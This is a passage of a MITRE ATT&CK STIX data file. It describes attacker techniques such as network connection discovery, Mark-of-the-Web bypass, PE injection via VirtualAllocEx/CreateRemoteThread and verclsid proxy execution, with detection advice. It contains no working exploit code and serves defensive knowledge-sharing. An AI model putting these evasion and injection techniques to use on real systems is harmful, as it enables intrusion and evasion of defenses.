gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.\n\nUtilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), \"net use,\" and \"net session\" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to \"net session\". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian", "Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "IaaS", "Linux", "macOS", "Network"], "x_mitre_version": "2.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", "created": "2017-05-31T21:30:45.139Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1049", "external_id": "T1049"}, {"source_name": "Amazon AWS VPC Guide", "description": "Amazon. (n.d.). What Is Amazon VPC?. Retrieved October 6, 2019.", "url": "https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html"}, {"source_name": "Microsoft Azure Virtual Network Overview", "description": "Annamalai, N., Casey, C., Almeida, M., et. al.. (2019, June 18). What is Azure Virtual Network?. Retrieved October 6, 2019.", "url": "https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview"}, {"source_name": "Google VPC Overview", "description": "Google. (2019, September 23). Virtual Private Cloud (VPC) network overview. Retrieved October 6, 2019.", "url": "https://cloud.google.com/vpc/docs/vpc"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-03-28T03:53:28.299Z", "name": "Compromise Infrastructure", "description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking)\n\nBy using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Jeremy Galloway", "Shailesh Tiwary (Indian Army)", "Goldstein Menachem"], "x_mitre_deprecated": false, "x_mitre_detection": "Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet. \n\nOnce adversaries have provisioned compromised infrastructure (ex: a server for use in command and control), internet scans may help proactively discover compromised infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "created": "2020-10-01T00:36:30.759Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1584", "external_id": "T1584"}, {"source_name": "amnesty_nso_pegasus", "description": "Amnesty International Security Lab. (2021, July 18). Forensic Methodology Report: How to catch NSO Group\u2019s Pegasus. Retrieved February 22, 2022.", "url": "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/"}, {"source_name": "Sysdig Proxyjacking", "description": "Crystal Morin. (2023, April 4). Proxyjacking has Entered the Chat. Retrieved July 6, 2023.", "url": "https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/"}, {"source_name": "FireEye DNS Hijack 2019", "description": "Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.", "url": "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html"}, {"source_name": "ICANNDomainNameHijacking", "description": "ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.", "url": "https://www.icann.org/groups/ssac/documents/sac-007-en"}, {"source_name": "Koczwara Beacon Hunting Sep 2021", "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2"}, {"source_name": "Mandiant APT1", "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"}, {"source_name": "Talos DNSpionage Nov 2018", "description": "Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.", "url": "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html"}, {"source_name": "NSA NCSC Turla OilRig", "description": "NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.", "url": "https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf"}, {"source_name": "Mandiant SCANdalous Jul 2020", "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation"}, {"source_name": "ThreatConnect Infrastructure Dec 2020", "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"}, {"source_name": "FireEye EPS Awakens Part 2", "description": "Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", "url": "https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-03-22T14:19:50.768Z", "name": "Mark-of-the-Web Bypass", "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Christiaan Beek, @ChristiaanBeek"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.(Citation: Disable automount for ISO)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961", "created": "2021-02-22T14:20:31.650Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1553/005", "external_id": "T1553.005"}, {"source_name": "Beek Use of VHD Dec 2020", "description": "Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021.", "url": "https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316"}, {"source_name": "Outflank MotW 2020", "description": "Hegt, S. (2020, March 30). Mark-of-the-Web from a red team\u2019s perspective. Retrieved February 22, 2021.", "url": "https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/"}, {"source_name": "Intezer Russian APT Dec 2020", "description": "Kennedy, J. (2020, December 9). A Zebra in Gopher's Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021.", "url": "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"}, {"source_name": "Microsoft Zone.Identifier 2020", "description": "Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021.", "url": "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8"}, {"source_name": "Disable automount for ISO", "description": "wordmann. (2022, February 8). Disable Disc Imgage. Retrieved February 8, 2022.", "url": "https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Disable Crypto Hardware", "description": "Adversaries disable a network device\u2019s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.\n\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5", "created": "2020-10-19T19:11:18.757Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1600/002", "external_id": "T1600.002"}, {"source_name": "Cisco Blog Legacy Device Attacks", "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-02-26T14:26:14.364Z", "name": "Pre-OS Boot", "description": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)\n\nAdversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.\n\nDisk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "Network", "macOS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Host intrusion prevention systems", "File monitoring"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "created": "2019-11-13T14:44:49.439Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1542", "external_id": "T1542"}, {"source_name": "ITWorld Hard Disk Health Dec 2014", "description": "Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018.", "url": "https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html"}, {"source_name": "Wikipedia Booting", "description": "Wikipedia. (n.d.). Booting. Retrieved November 13, 2019.", "url": "https://en.wikipedia.org/wiki/Booting"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-01-27T14:49:39.188Z", "name": "Scripting", "description": "**This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**\n\nAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_detection": "Scripting may be common on admin, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\n\nAnalyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Process whitelisting", "Data Execution Prevention", "Exploit Prevention"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7fd87010-3a00-4da3-b905-410525e8ec44", "created": "2017-05-31T21:30:51.733Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1064", "external_id": "T1064"}, {"source_name": "Metasploit_Ref", "description": "Metasploit. (n.d.). Retrieved December 4, 2014.", "url": "http://www.metasploit.com"}, {"source_name": "Veil_Ref", "description": "Veil Framework. (n.d.). Retrieved December 4, 2014.", "url": "https://www.veil-framework.com/framework/"}, {"source_name": "Powersploit", "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", "url": "https://github.com/mattifestation/PowerSploit"}, {"source_name": "Alperovitch 2014", "description": "Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.", "url": "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/"}, {"source_name": "Uperesia Malicious Office Documents", "description": "Felix. (2016, September). Analyzing Malicious Office Documents. Retrieved April 11, 2018.", "url": "https://www.uperesia.com/analyzing-malicious-office-documents"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Build Image on Host", "description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\n\nAn adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it\u2019s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security", "Roi Kol, @roykol1, Team Nautilus Aqua Security", "Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security", "Vishwas Manral, McAfee"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment. Additionally monitor for subsequent network communication with anomalous IPs that have never been seen before in the environment that indicate the download of malicious code.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Containers"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--800f9819-7007-4540-a520-40e655876800", "created": "2021-03-30T17:54:03.944Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1612", "external_id": "T1612"}, {"source_name": "Aqua Build Images on Hosts", "description": "Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.", "url": "https://blog.aquasec.com/malicious-container-image-docker-container-host"}, {"source_name": "Docker Build Image", "description": "Docker. ( null). Docker Engine API v1.41 Reference - Build an Image. Retrieved March 30, 2021.", "url": "https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild"}, {"source_name": "Aqua Security Cloud Native Threat Report June 2021", "description": "Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.", "url": "https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Shared Webroot", "description": "**This technique has been deprecated and should no longer be used.**\n\nAdversaries may add malicious content to an internally accessible website through an open network file share that contains the website's webroot or Web content directory (Citation: Microsoft Web Root OCT 2016) (Citation: Apache Server 2018) and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured.\n\nThis mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited. (Citation: Webroot PHP 2011)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_detection": "Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use process monitoring to identify normal processes that run on the Web server and detect processes that are not typically executed.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_system_requirements": ["Shared webroot directory on remote system"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--804c042c-cfe6-449e-bc1a-ba0a998a70db", "created": "2017-05-31T21:30:46.047Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1051", "external_id": "T1051"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/563.html", "external_id": "CAPEC-563"}, {"source_name": "Microsoft Web Root OCT 2016", "description": "Microsoft. (2016, October 20). How to: Find the Web Application Root. Retrieved July 27, 2018."}, {"source_name": "Apache Server 2018", "description": "Apache. (n.d.). Apache HTTP Server Version 2.4 Documentation - Web Site Content. Retrieved July 27, 2018.", "url": "http://httpd.apache.org/docs/2.4/getting-started.html#content"}, {"source_name": "Webroot PHP 2011", "description": "Brandt, Andrew. (2011, February 22). Malicious PHP Scripts on the Rise. Retrieved October 3, 2018.", "url": "https://www.webroot.com/blog/2011/02/22/malicious-php-scripts-on-the-rise/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Portable Executable Injection", "description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Application control"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", "created": "2020-01-14T01:27:31.344Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1055/002", "external_id": "T1055.002"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-10-25T14:00:00.188Z", "name": "Verclsid", "description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)\n\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious 